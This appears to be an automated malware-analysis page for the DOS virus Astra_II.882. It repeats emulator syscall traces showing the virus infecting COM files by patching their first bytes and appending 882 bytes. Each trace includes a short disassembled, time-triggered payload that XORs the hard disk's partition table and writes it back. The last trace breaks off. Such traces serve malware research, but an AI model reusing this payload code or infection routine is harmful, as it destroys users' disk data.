Sample viewer

vx.netlux.org/Virus.DOS.Astra_II.882

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:16:18.771648619Z 53 PC: 12ac3 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:16:18.773258342Z 2 PC: 12aec | Character output (Char = '00')
2018-12-17T22:16:18.77536445Z 37 PC: 12b20 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:16:18.776389078Z 48 PC: 12b24 | Get DOS version
2018-12-17T22:16:18.777462672Z 26 PC: 12ccc | Set disk transfer address
2018-12-17T22:16:18.778570368Z 78 PC: 12cd3 | Find first file
2018-12-17T22:16:18.782544396Z 61 PC: 12d12 | Open file (Filename = '')
2018-12-17T22:16:18.78656244Z 63 PC: 12d2d | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:16:18.790733235Z 66 PC: 12d51 | Move file pointer
2018-12-17T22:16:18.791929729Z 66 PC: 12d75 | Move file pointer
2018-12-17T22:16:18.792855125Z 64 PC: 12d87 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:16:18.794855684Z 66 PC: 12d96 | Move file pointer
2018-12-17T22:16:18.795944251Z 64 PC: 12da8 | Write file or device (Write 882 bytes on handle 5)
2018-12-17T22:16:18.807285675Z 62 PC: 12db5 | Close file
2018-12-17T22:16:18.814832554Z 79 PC: 12ce5 | Find next file
2018-12-17T22:16:18.816813443Z 61 PC: 12d12 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:16:18.820928951Z 63 PC: 12d2d | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:16:18.837290493Z 66 PC: 12d51 | Move file pointer
2018-12-17T22:16:18.839462305Z 66 PC: 12d75 | Move file pointer
2018-12-17T22:16:18.840857468Z 64 PC: 12d87 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:16:18.843593977Z 66 PC: 12d96 | Move file pointer
2018-12-17T22:16:18.845770062Z 64 PC: 12da8 | Write file or device (Write 882 bytes on handle 5)
2018-12-17T22:16:18.85425719Z 62 PC: 12db5 | Close file
2018-12-17T22:16:18.862016954Z 79 PC: 12ce5 | Find next file
2018-12-17T22:16:18.864991694Z 61 PC: 12d12 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:16:18.871682195Z 63 PC: 12d2d | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:16:18.877691726Z 66 PC: 12d51 | Move file pointer
2018-12-17T22:16:18.883662443Z 66 PC: 12d75 | Move file pointer
2018-12-17T22:16:18.88502043Z 64 PC: 12d87 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:16:18.887613016Z 66 PC: 12d96 | Move file pointer
2018-12-17T22:16:18.890206087Z 64 PC: 12da8 | Write file or device (Write 882 bytes on handle 5)
2018-12-17T22:16:18.898486236Z 62 PC: 12db5 | Close file
2018-12-17T22:16:18.906468556Z 79 PC: 12ce5 | Find next file
2018-12-17T22:16:18.9089755Z 61 PC: 12d12 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:16:18.915491784Z 63 PC: 12d2d | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:16:18.922025748Z 66 PC: 12d51 | Move file pointer
2018-12-17T22:16:18.923251039Z 66 PC: 12d75 | Move file pointer
2018-12-17T22:16:18.924911305Z 64 PC: 12d87 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:16:18.927354581Z 66 PC: 12d96 | Move file pointer
2018-12-17T22:16:18.928954895Z 64 PC: 12da8 | Write file or device (Write 882 bytes on handle 5)
2018-12-17T22:16:18.937448549Z 62 PC: 12db5 | Close file
2018-12-17T22:16:18.945200437Z 79 PC: 12ce5 | Find next file
2018-12-17T22:16:18.947590867Z 61 PC: 12d12 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:16:18.954185603Z 63 PC: 12d2d | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:16:18.960185301Z 66 PC: 12d51 | Move file pointer
2018-12-17T22:16:18.961401182Z 66 PC: 12d75 | Move file pointer
2018-12-17T22:16:18.963246629Z 64 PC: 12d87 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:16:18.966067153Z 66 PC: 12d96 | Move file pointer
2018-12-17T22:16:18.967737388Z 64 PC: 12da8 | Write file or device (Write 882 bytes on handle 5)
2018-12-17T22:16:18.976448601Z 62 PC: 12db5 | Close file
2018-12-17T22:16:18.98493443Z 79 PC: 12ce5 | Find next file
2018-12-17T22:16:18.987653065Z 61 PC: 12d12 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:16:18.995183769Z 63 PC: 12d2d | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:16:19.001504667Z 66 PC: 12d51 | Move file pointer
2018-12-17T22:16:19.003167519Z 66 PC: 12d75 | Move file pointer
2018-12-17T22:16:19.004760714Z 64 PC: 12d87 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:16:19.008824217Z 66 PC: 12d96 | Move file pointer
2018-12-17T22:16:19.010791833Z 64 PC: 12da8 | Write file or device (Write 882 bytes on handle 5)
2018-12-17T22:16:19.019862868Z 62 PC: 12db5 | Close file
2018-12-17T22:16:19.02713428Z 79 PC: 12ce5 | Find next file
2018-12-17T22:16:19.028836713Z 61 PC: 12d12 | Open file (Filename = 'PAH.COM')
2018-12-17T22:16:19.032818637Z 63 PC: 12d2d | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:16:19.037476797Z 66 PC: 12d51 | Move file pointer
2018-12-17T22:16:19.038425793Z 66 PC: 12d75 | Move file pointer
2018-12-17T22:16:19.039458573Z 64 PC: 12d87 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:16:19.041686596Z 66 PC: 12d96 | Move file pointer
2018-12-17T22:16:19.04280635Z 64 PC: 12da8 | Write file or device (Write 882 bytes on handle 5)
2018-12-17T22:16:19.048045737Z 62 PC: 12db5 | Close file
2018-12-17T22:16:19.053476598Z 79 PC: 12ce5 | Find next file
2018-12-17T22:16:19.055805528Z 61 PC: 12d12 | Open file (Filename = 'TEST.COM')
2018-12-17T22:16:19.062063405Z 63 PC: 12d2d | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:16:19.065122893Z 66 PC: 12d51 | Move file pointer
2018-12-17T22:16:19.066404174Z 62 PC: 12db5 | Close file
2018-12-17T22:16:19.067988998Z 79 PC: 12ce5 | Find next file
2018-12-17T22:16:19.070868932Z 26 PC: 12cf0 | Set disk transfer address
2018-12-17T22:16:19.072331483Z 26 PC: 12ccc | Set disk transfer address
2018-12-17T22:16:19.073314592Z 78 PC: 12cd3 | Find first file
2018-12-17T22:16:19.07809969Z 26 PC: 12cf0 | Set disk transfer address
2018-12-17T22:16:19.078976451Z 44 PC: 12b82 | Get time 0x12b82: cmp cl, 0x11
0x12b85: jne 0x12bc0
0x12b87: mov bx, bp
0x12b89: add bx, 0x3ad
0x12b8d: mov dx, 0x80
0x12b90: mov cx, 1
0x12b93: mov ax, 0x201
0x12b96: int 0x13
0x12b98: xor si, si
0x12b9a: xor byte ptr [bx + si + 0x1c2], 0x55
0x12b9f: add si, 0x10
0x12ba2: cmp si, 0x40
0x12ba5: jle 0x12b9a
0x12ba7: mov dx, 0x80
0x12baa: mov cx, 1
0x12bad: mov ax, 0x301
0x12bb0: int 0x13
0x12bb2: mov ax, 0x1102
0x12bb5: mov bl, al
0x12bb7: int 0x10
2018-12-17T22:16:19.080502481Z 9 PC: 12aa2 | Display string (String= 'ABCDE - This is a 100 byte COM test, 1994 ')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":2927,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:47:44.715998222Z 53 PC: 12ac3 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:47:44.717929181Z 2 PC: 12aec | Character output (Char = '00')
2018-12-25T11:47:44.720906084Z 37 PC: 12b20 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:47:44.722506889Z 48 PC: 12b24 | Get DOS version
2018-12-25T11:47:44.723931637Z 26 PC: 12ccc | Set disk transfer address
2018-12-25T11:47:44.729611073Z 78 PC: 12cd3 | Find first file
2018-12-25T11:47:44.735842714Z 61 PC: 12d12 | Open file (Filename = '')
2018-12-25T11:47:44.743137053Z 63 PC: 12d2d | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:47:44.749865941Z 66 PC: 12d51 | Move file pointer
2018-12-25T11:47:44.751873562Z 66 PC: 12d75 | Move file pointer
2018-12-25T11:47:44.753177328Z 64 PC: 12d87 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:47:44.756158521Z 66 PC: 12d96 | Move file pointer
2018-12-25T11:47:44.75775732Z 64 PC: 12da8 | Write file or device (Write 882 bytes on handle 5)
2018-12-25T11:47:44.771943262Z 62 PC: 12db5 | Close file
2018-12-25T11:47:44.798521052Z 79 PC: 12ce5 | Find next file
2018-12-25T11:47:44.800203786Z 61 PC: 12d12 | Open file (See above)
2018-12-25T11:47:44.807137852Z 63 PC: 12d2d | Read file or device (See above)
2018-12-25T11:47:44.814010924Z 66 PC: 12d51 | Move file pointer (See above)
2018-12-25T11:47:44.815369763Z 66 PC: 12d75 | Move file pointer (See above)
2018-12-25T11:47:44.816521345Z 64 PC: 12d87 | Write file or device (See above)
2018-12-25T11:47:44.820272562Z 66 PC: 12d96 | Move file pointer (See above)
2018-12-25T11:47:44.822047606Z 64 PC: 12da8 | Write file or device (See above)
2018-12-25T11:47:44.830377964Z 62 PC: 12db5 | Close file (See above)
2018-12-25T11:47:44.839072186Z 79 PC: 12ce5 | Find next file (See above)
2018-12-25T11:47:44.841966881Z 61 PC: 12d12 | Open file (See above)
2018-12-25T11:47:44.848428506Z 63 PC: 12d2d | Read file or device (See above)
2018-12-25T11:47:44.855026525Z 66 PC: 12d51 | Move file pointer (See above)
2018-12-25T11:47:44.856480551Z 66 PC: 12d75 | Move file pointer (See above)
2018-12-25T11:47:44.857838533Z 64 PC: 12d87 | Write file or device (See above)
2018-12-25T11:47:44.860838108Z 66 PC: 12d96 | Move file pointer (See above)
2018-12-25T11:47:44.862521454Z 64 PC: 12da8 | Write file or device (See above)
2018-12-25T11:47:44.87130149Z 62 PC: 12db5 | Close file (See above)
2018-12-25T11:47:44.880167076Z 79 PC: 12ce5 | Find next file (See above)
2018-12-25T11:47:44.89769744Z 61 PC: 12d12 | Open file (See above)
2018-12-25T11:47:44.904624021Z 63 PC: 12d2d | Read file or device (See above)
2018-12-25T11:47:44.911716444Z 66 PC: 12d51 | Move file pointer (See above)
2018-12-25T11:47:44.913300932Z 66 PC: 12d75 | Move file pointer (See above)
2018-12-25T11:47:44.915202816Z 64 PC: 12d87 | Write file or device (See above)
2018-12-25T11:47:44.917822775Z 66 PC: 12d96 | Move file pointer (See above)
2018-12-25T11:47:44.924878507Z 64 PC: 12da8 | Write file or device (See above)
2018-12-25T11:47:44.935286939Z 62 PC: 12db5 | Close file (See above)
2018-12-25T11:47:44.944003815Z 79 PC: 12ce5 | Find next file (See above)
2018-12-25T11:47:44.949234234Z 61 PC: 12d12 | Open file (See above)
2018-12-25T11:47:44.95708277Z 63 PC: 12d2d | Read file or device (See above)
2018-12-25T11:47:44.963451981Z 66 PC: 12d51 | Move file pointer (See above)
2018-12-25T11:47:44.96575073Z 66 PC: 12d75 | Move file pointer (See above)
2018-12-25T11:47:44.967078679Z 64 PC: 12d87 | Write file or device (See above)
2018-12-25T11:47:44.96963907Z 66 PC: 12d96 | Move file pointer (See above)
2018-12-25T11:47:44.972786184Z 64 PC: 12da8 | Write file or device (See above)
2018-12-25T11:47:44.98157991Z 62 PC: 12db5 | Close file (See above)
2018-12-25T11:47:44.990170303Z 79 PC: 12ce5 | Find next file (See above)
2018-12-25T11:47:44.993377175Z 61 PC: 12d12 | Open file (See above)
2018-12-25T11:47:45.00011352Z 63 PC: 12d2d | Read file or device (See above)
2018-12-25T11:47:45.006672906Z 66 PC: 12d51 | Move file pointer (See above)
2018-12-25T11:47:45.00909078Z 66 PC: 12d75 | Move file pointer (See above)
2018-12-25T11:47:45.010871591Z 64 PC: 12d87 | Write file or device (See above)
2018-12-25T11:47:45.013764952Z 66 PC: 12d96 | Move file pointer (See above)
2018-12-25T11:47:45.015931843Z 64 PC: 12da8 | Write file or device (See above)
2018-12-25T11:47:45.025719989Z 62 PC: 12db5 | Close file (See above)
2018-12-25T11:47:45.034028926Z 79 PC: 12ce5 | Find next file (See above)
2018-12-25T11:47:45.037228588Z 61 PC: 12d12 | Open file (See above)
2018-12-25T11:47:45.045029472Z 63 PC: 12d2d | Read file or device (See above)
2018-12-25T11:47:45.051594665Z 66 PC: 12d51 | Move file pointer (See above)
2018-12-25T11:47:45.053256124Z 66 PC: 12d75 | Move file pointer (See above)
2018-12-25T11:47:45.056016086Z 64 PC: 12d87 | Write file or device (See above)
2018-12-25T11:47:45.058922646Z 66 PC: 12d96 | Move file pointer (See above)
2018-12-25T11:47:45.060886317Z 64 PC: 12da8 | Write file or device (See above)
2018-12-25T11:47:45.070140827Z 62 PC: 12db5 | Close file (See above)
2018-12-25T11:47:45.078696241Z 79 PC: 12ce5 | Find next file (See above)
2018-12-25T11:47:45.081543073Z 61 PC: 12d12 | Open file (See above)
2018-12-25T11:47:45.089687046Z 63 PC: 12d2d | Read file or device (See above)
2018-12-25T11:47:45.092829224Z 66 PC: 12d51 | Move file pointer (See above)
2018-12-25T11:47:45.094226373Z 62 PC: 12db5 | Close file (See above)
2018-12-25T11:47:45.096640522Z 79 PC: 12ce5 | Find next file (See above)
2018-12-25T11:47:45.099107052Z 26 PC: 12cf0 | Set disk transfer address
2018-12-25T11:47:45.100482429Z 26 PC: 12ccc | Set disk transfer address (See above)
2018-12-25T11:47:45.104032447Z 78 PC: 12cd3 | Find first file (See above)
2018-12-25T11:47:45.109966308Z 26 PC: 12cf0 | Set disk transfer address (See above)
2018-12-25T11:47:45.111217262Z 44 PC: 12b82 | Get time 0x12b82: cmp cl, 0x11
0x12b85: jne 0x12bc0
0x12b87: mov bx, bp
0x12b89: add bx, 0x3ad
0x12b8d: mov dx, 0x80
0x12b90: mov cx, 1
0x12b93: mov ax, 0x201
0x12b96: int 0x13
0x12b98: xor si, si
0x12b9a: xor byte ptr [bx + si + 0x1c2], 0x55
0x12b9f: add si, 0x10
0x12ba2: cmp si, 0x40
0x12ba5: jle 0x12b9a
0x12ba7: mov dx, 0x80
0x12baa: mov cx, 1
0x12bad: mov ax, 0x301
0x12bb0: int 0x13
0x12bb2: mov ax, 0x1102
0x12bb5: mov bl, al
0x12bb7: int 0x10
2018-12-25T11:47:45.11436267Z 9 PC: 12aa2 | Display string (String= 'ABCDE - This is a 100 byte COM test, 1994 ')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":17,"Second":0,"TimeBased":true,"OriginalID":2927,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:47:46.335557793Z 53 PC: 12ac3 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:47:46.33769764Z 2 PC: 12aec | Character output (Char = '00')
2018-12-25T11:47:46.339982079Z 37 PC: 12b20 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:47:46.341214807Z 48 PC: 12b24 | Get DOS version
2018-12-25T11:47:46.342969023Z 26 PC: 12ccc | Set disk transfer address
2018-12-25T11:47:46.344113171Z 78 PC: 12cd3 | Find first file
2018-12-25T11:47:46.350321541Z 61 PC: 12d12 | Open file (Filename = '')
2018-12-25T11:47:46.357824601Z 63 PC: 12d2d | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:47:46.367143104Z 66 PC: 12d51 | Move file pointer
2018-12-25T11:47:46.369052768Z 66 PC: 12d75 | Move file pointer
2018-12-25T11:47:46.375646091Z 64 PC: 12d87 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:47:46.378688552Z 66 PC: 12d96 | Move file pointer
2018-12-25T11:47:46.38165289Z 64 PC: 12da8 | Write file or device (Write 882 bytes on handle 5)
2018-12-25T11:47:46.397867898Z 62 PC: 12db5 | Close file
2018-12-25T11:47:46.405829321Z 79 PC: 12ce5 | Find next file
2018-12-25T11:47:46.408697733Z 61 PC: 12d12 | Open file (See above)
2018-12-25T11:47:46.416349082Z 63 PC: 12d2d | Read file or device (See above)
2018-12-25T11:47:46.422826394Z 66 PC: 12d51 | Move file pointer (See above)
2018-12-25T11:47:46.424511544Z 66 PC: 12d75 | Move file pointer (See above)
2018-12-25T11:47:46.426865676Z 64 PC: 12d87 | Write file or device (See above)
2018-12-25T11:47:46.429778405Z 66 PC: 12d96 | Move file pointer (See above)
2018-12-25T11:47:46.431796463Z 64 PC: 12da8 | Write file or device (See above)
2018-12-25T11:47:46.440519063Z 62 PC: 12db5 | Close file (See above)
2018-12-25T11:47:46.449776344Z 79 PC: 12ce5 | Find next file (See above)
2018-12-25T11:47:46.452749079Z 61 PC: 12d12 | Open file (See above)
2018-12-25T11:47:46.460434243Z 63 PC: 12d2d | Read file or device (See above)
2018-12-25T11:47:46.468245767Z 66 PC: 12d51 | Move file pointer (See above)
2018-12-25T11:47:46.469688614Z 66 PC: 12d75 | Move file pointer (See above)
2018-12-25T11:47:46.471101945Z 64 PC: 12d87 | Write file or device (See above)
2018-12-25T11:47:46.474520232Z 66 PC: 12d96 | Move file pointer (See above)
2018-12-25T11:47:46.476272822Z 64 PC: 12da8 | Write file or device (See above)
2018-12-25T11:47:46.484422079Z 62 PC: 12db5 | Close file (See above)
2018-12-25T11:47:46.492744605Z 79 PC: 12ce5 | Find next file (See above)
2018-12-25T11:47:46.495463959Z 61 PC: 12d12 | Open file (See above)
2018-12-25T11:47:46.501932581Z 63 PC: 12d2d | Read file or device (See above)
2018-12-25T11:47:46.508995786Z 66 PC: 12d51 | Move file pointer (See above)
2018-12-25T11:47:46.510428315Z 66 PC: 12d75 | Move file pointer (See above)
2018-12-25T11:47:46.511747119Z 64 PC: 12d87 | Write file or device (See above)
2018-12-25T11:47:46.515225156Z 66 PC: 12d96 | Move file pointer (See above)
2018-12-25T11:47:46.516928363Z 64 PC: 12da8 | Write file or device (See above)
2018-12-25T11:47:46.525588168Z 62 PC: 12db5 | Close file (See above)
2018-12-25T11:47:46.534980458Z 79 PC: 12ce5 | Find next file (See above)
2018-12-25T11:47:46.537653301Z 61 PC: 12d12 | Open file (See above)
2018-12-25T11:47:46.544481894Z 63 PC: 12d2d | Read file or device (See above)
2018-12-25T11:47:46.55160733Z 66 PC: 12d51 | Move file pointer (See above)
2018-12-25T11:47:46.553101902Z 66 PC: 12d75 | Move file pointer (See above)
2018-12-25T11:47:46.55453198Z 64 PC: 12d87 | Write file or device (See above)
2018-12-25T11:47:46.557708283Z 66 PC: 12d96 | Move file pointer (See above)
2018-12-25T11:47:46.559392441Z 64 PC: 12da8 | Write file or device (See above)
2018-12-25T11:47:46.568317612Z 62 PC: 12db5 | Close file (See above)
2018-12-25T11:47:46.577331657Z 79 PC: 12ce5 | Find next file (See above)
2018-12-25T11:47:46.579895697Z 61 PC: 12d12 | Open file (See above)
2018-12-25T11:47:46.586275936Z 63 PC: 12d2d | Read file or device (See above)
2018-12-25T11:47:46.594137233Z 66 PC: 12d51 | Move file pointer (See above)
2018-12-25T11:47:46.595574591Z 66 PC: 12d75 | Move file pointer (See above)
2018-12-25T11:47:46.596943822Z 64 PC: 12d87 | Write file or device (See above)
2018-12-25T11:47:46.599537234Z 66 PC: 12d96 | Move file pointer (See above)
2018-12-25T11:47:46.602098131Z 64 PC: 12da8 | Write file or device (See above)
2018-12-25T11:47:46.610972226Z 62 PC: 12db5 | Close file (See above)
2018-12-25T11:47:46.619061695Z 79 PC: 12ce5 | Find next file (See above)
2018-12-25T11:47:46.623276264Z 61 PC: 12d12 | Open file (See above)
2018-12-25T11:47:46.630001005Z 63 PC: 12d2d | Read file or device (See above)
2018-12-25T11:47:46.636581066Z 66 PC: 12d51 | Move file pointer (See above)
2018-12-25T11:47:46.639001022Z 66 PC: 12d75 | Move file pointer (See above)
2018-12-25T11:47:46.64064242Z 64 PC: 12d87 | Write file or device (See above)
2018-12-25T11:47:46.643496197Z 66 PC: 12d96 | Move file pointer (See above)
2018-12-25T11:47:46.646457537Z 64 PC: 12da8 | Write file or device (See above)
2018-12-25T11:47:46.654784635Z 62 PC: 12db5 | Close file (See above)
2018-12-25T11:47:46.663152028Z 79 PC: 12ce5 | Find next file (See above)
2018-12-25T11:47:46.6668244Z 61 PC: 12d12 | Open file (See above)
2018-12-25T11:47:46.673599115Z 63 PC: 12d2d | Read file or device (See above)
2018-12-25T11:47:46.67639803Z 66 PC: 12d51 | Move file pointer (See above)
2018-12-25T11:47:46.6787491Z 62 PC: 12db5 | Close file (See above)
2018-12-25T11:47:46.680869489Z 79 PC: 12ce5 | Find next file (See above)
2018-12-25T11:47:46.683541432Z 26 PC: 12cf0 | Set disk transfer address
2018-12-25T11:47:46.685907441Z 26 PC: 12ccc | Set disk transfer address (See above)
2018-12-25T11:47:46.687334724Z 78 PC: 12cd3 | Find first file (See above)
2018-12-25T11:47:46.693229812Z 26 PC: 12cf0 | Set disk transfer address (See above)
2018-12-25T11:47:46.695368247Z 44 PC: 12b82 | Get time 0x12b82: cmp cl, 0x11
0x12b85: jne 0x12bc0
0x12b87: mov bx, bp
0x12b89: add bx, 0x3ad
0x12b8d: mov dx, 0x80
0x12b90: mov cx, 1
0x12b93: mov ax, 0x201
0x12b96: int 0x13
0x12b98: xor si, si
0x12b9a: xor byte ptr [bx + si + 0x1c2], 0x55
0x12b9f: add si, 0x10
0x12ba2: cmp si, 0x40
0x12ba5: jle 0x12b9a
0x12ba7: mov dx, 0x80
0x12baa: mov cx, 1
0x12bad: mov ax, 0x301
0x12bb0: int 0x13
0x12bb2: mov ax, 0x1102
0x12bb5: mov bl, al
0x12bb7: int 0x10
2018-12-25T11:47:47.020721112Z 9 PC: 12aa2 | Display string (String= 'ABCDE - This is a 100 byte COM test, 1994 ')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":2927,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:47:47.384966151Z 53 PC: 12ac3 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:47:47.387013126Z 2 PC: 12aec | Character output (Char = '00')
2018-12-25T11:47:47.389730549Z 37 PC: 12b20 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:47:47.391567027Z 48 PC: 12b24 | Get DOS version
2018-12-25T11:47:47.393557821Z 26 PC: 12ccc | Set disk transfer address
2018-12-25T11:47:47.395089747Z 78 PC: 12cd3 | Find first file
2018-12-25T11:47:47.402603109Z 61 PC: 12d12 | Open file (Filename = '')
2018-12-25T11:47:47.410261497Z 63 PC: 12d2d | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:47:47.417791633Z 66 PC: 12d51 | Move file pointer
2018-12-25T11:47:47.41944765Z 66 PC: 12d75 | Move file pointer
2018-12-25T11:47:47.421145091Z 64 PC: 12d87 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:47:47.424634785Z 66 PC: 12d96 | Move file pointer
2018-12-25T11:47:47.426530185Z 64 PC: 12da8 | Write file or device (Write 882 bytes on handle 5)
2018-12-25T11:47:47.443882969Z 62 PC: 12db5 | Close file
2018-12-25T11:47:47.453612647Z 79 PC: 12ce5 | Find next file
2018-12-25T11:47:47.455704207Z 61 PC: 12d12 | Open file (See above)
2018-12-25T11:47:47.460076086Z 63 PC: 12d2d | Read file or device (See above)
2018-12-25T11:47:47.466223479Z 66 PC: 12d51 | Move file pointer (See above)
2018-12-25T11:47:47.467837977Z 66 PC: 12d75 | Move file pointer (See above)
2018-12-25T11:47:47.469308307Z 64 PC: 12d87 | Write file or device (See above)
2018-12-25T11:47:47.471866138Z 66 PC: 12d96 | Move file pointer (See above)
2018-12-25T11:47:47.473572938Z 64 PC: 12da8 | Write file or device (See above)
2018-12-25T11:47:47.479060738Z 62 PC: 12db5 | Close file (See above)
2018-12-25T11:47:47.485624044Z 79 PC: 12ce5 | Find next file (See above)
2018-12-25T11:47:47.488712792Z 61 PC: 12d12 | Open file (See above)
2018-12-25T11:47:47.496023535Z 63 PC: 12d2d | Read file or device (See above)
2018-12-25T11:47:47.503229677Z 66 PC: 12d51 | Move file pointer (See above)
2018-12-25T11:47:47.505541613Z 66 PC: 12d75 | Move file pointer (See above)
2018-12-25T11:47:47.507237694Z 64 PC: 12d87 | Write file or device (See above)
2018-12-25T11:47:47.510234003Z 66 PC: 12d96 | Move file pointer (See above)
2018-12-25T11:47:47.513348397Z 64 PC: 12da8 | Write file or device (See above)
2018-12-25T11:47:47.522885893Z 62 PC: 12db5 | Close file (See above)
2018-12-25T11:47:47.531760563Z 79 PC: 12ce5 | Find next file (See above)
2018-12-25T11:47:47.535276511Z 61 PC: 12d12 | Open file (See above)
2018-12-25T11:47:47.543360268Z 63 PC: 12d2d | Read file or device (See above)
2018-12-25T11:47:47.550599447Z 66 PC: 12d51 | Move file pointer (See above)
2018-12-25T11:47:47.553238181Z 66 PC: 12d75 | Move file pointer (See above)
2018-12-25T11:47:47.55495821Z 64 PC: 12d87 | Write file or device (See above)
2018-12-25T11:47:47.558288206Z 66 PC: 12d96 | Move file pointer (See above)
2018-12-25T11:47:47.561099387Z 64 PC: 12da8 | Write file or device (See above)
2018-12-25T11:47:47.570437848Z 62 PC: 12db5 | Close file (See above)
2018-12-25T11:47:47.581188174Z 79 PC: 12ce5 | Find next file (See above)
2018-12-25T11:47:47.585251531Z 61 PC: 12d12 | Open file (See above)
2018-12-25T11:47:47.593112471Z 63 PC: 12d2d | Read file or device (See above)
2018-12-25T11:47:47.600207739Z 66 PC: 12d51 | Move file pointer (See above)
2018-12-25T11:47:47.60190783Z 66 PC: 12d75 | Move file pointer (See above)
2018-12-25T11:47:47.604381632Z 64 PC: 12d87 | Write file or device (See above)
2018-12-25T11:47:47.607705127Z 66 PC: 12d96 | Move file pointer (See above)
2018-12-25T11:47:47.609998779Z 64 PC: 12da8 | Write file or device (See above)
2018-12-25T11:47:47.620925911Z 62 PC: 12db5 | Close file (See above)
2018-12-25T11:47:47.630278054Z 79 PC: 12ce5 | Find next file (See above)
2018-12-25T11:47:47.633198822Z 61 PC: 12d12 | Open file (See above)
2018-12-25T11:47:47.640926904Z 63 PC: 12d2d | Read file or device (See above)
2018-12-25T11:47:47.647956751Z 66 PC: 12d51 | Move file pointer (See above)
2018-12-25T11:47:47.650271198Z 66 PC: 12d75 | Move file pointer (See above)
2018-12-25T11:47:47.652407393Z 64 PC: 12d87 | Write file or device (See above)
2018-12-25T11:47:47.655745745Z 66 PC: 12d96 | Move file pointer (See above)
2018-12-25T11:47:47.658003618Z 64 PC: 12da8 | Write file or device (See above)
2018-12-25T11:47:47.668862369Z 62 PC: 12db5 | Close file (See above)
2018-12-25T11:47:47.678225838Z 79 PC: 12ce5 | Find next file (See above)
2018-12-25T11:47:47.681548345Z 61 PC: 12d12 | Open file (See above)
2018-12-25T11:47:47.689221925Z 63 PC: 12d2d | Read file or device (See above)
2018-12-25T11:47:47.697452796Z 66 PC: 12d51 | Move file pointer (See above)
2018-12-25T11:47:47.69905373Z 66 PC: 12d75 | Move file pointer (See above)
2018-12-25T11:47:47.700667254Z 64 PC: 12d87 | Write file or device (See above)
2018-12-25T11:47:47.705234551Z 66 PC: 12d96 | Move file pointer (See above)
2018-12-25T11:47:47.707312511Z 64 PC: 12da8 | Write file or device (See above)
2018-12-25T11:47:47.717852843Z 62 PC: 12db5 | Close file (See above)
2018-12-25T11:47:47.728068913Z 79 PC: 12ce5 | Find next file (See above)
2018-12-25T11:47:47.731378571Z 61 PC: 12d12 | Open file (See above)
2018-12-25T11:47:47.73801057Z 63 PC: 12d2d | Read file or device (See above)
2018-12-25T11:47:47.74030244Z 66 PC: 12d51 | Move file pointer (See above)
2018-12-25T11:47:47.741705512Z 62 PC: 12db5 | Close file (See above)
2018-12-25T11:47:47.743708108Z 79 PC: 12ce5 | Find next file (See above)
2018-12-25T11:47:47.746881043Z 26 PC: 12cf0 | Set disk transfer address
2018-12-25T11:47:47.749325136Z 26 PC: 12ccc | Set disk transfer address (See above)
2018-12-25T11:47:47.750727241Z 78 PC: 12cd3 | Find first file (See above)
2018-12-25T11:47:47.757379469Z 26 PC: 12cf0 | Set disk transfer address (See above)
2018-12-25T11:47:47.758741061Z 44 PC: 12b82 | Get time 0x12b82: cmp cl, 0x11
0x12b85: jne 0x12bc0
0x12b87: mov bx, bp
0x12b89: add bx, 0x3ad
0x12b8d: mov dx, 0x80
0x12b90: mov cx, 1
0x12b93: mov ax, 0x201
0x12b96: int 0x13
0x12b98: xor si, si
0x12b9a: xor byte ptr [bx + si + 0x1c2], 0x55
0x12b9f: add si, 0x10
0x12ba2: cmp si, 0x40
0x12ba5: jle 0x12b9a
0x12ba7: mov dx, 0x80
0x12baa: mov cx, 1
0x12bad: mov ax, 0x301
0x12bb0: int 0x13
0x12bb2: mov ax, 0x1102
0x12bb5: mov bl, al
0x12bb7: int 0x10
2018-12-25T11:47:47.76123902Z 9 PC: 12aa2 | Display string (String= 'ABCDE - This is a 100 byte COM test, 1994 ')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":17,"Second":0,"TimeBased":true,"OriginalID":2927,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:47:47.87435579Z 53 PC: 12ac3 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
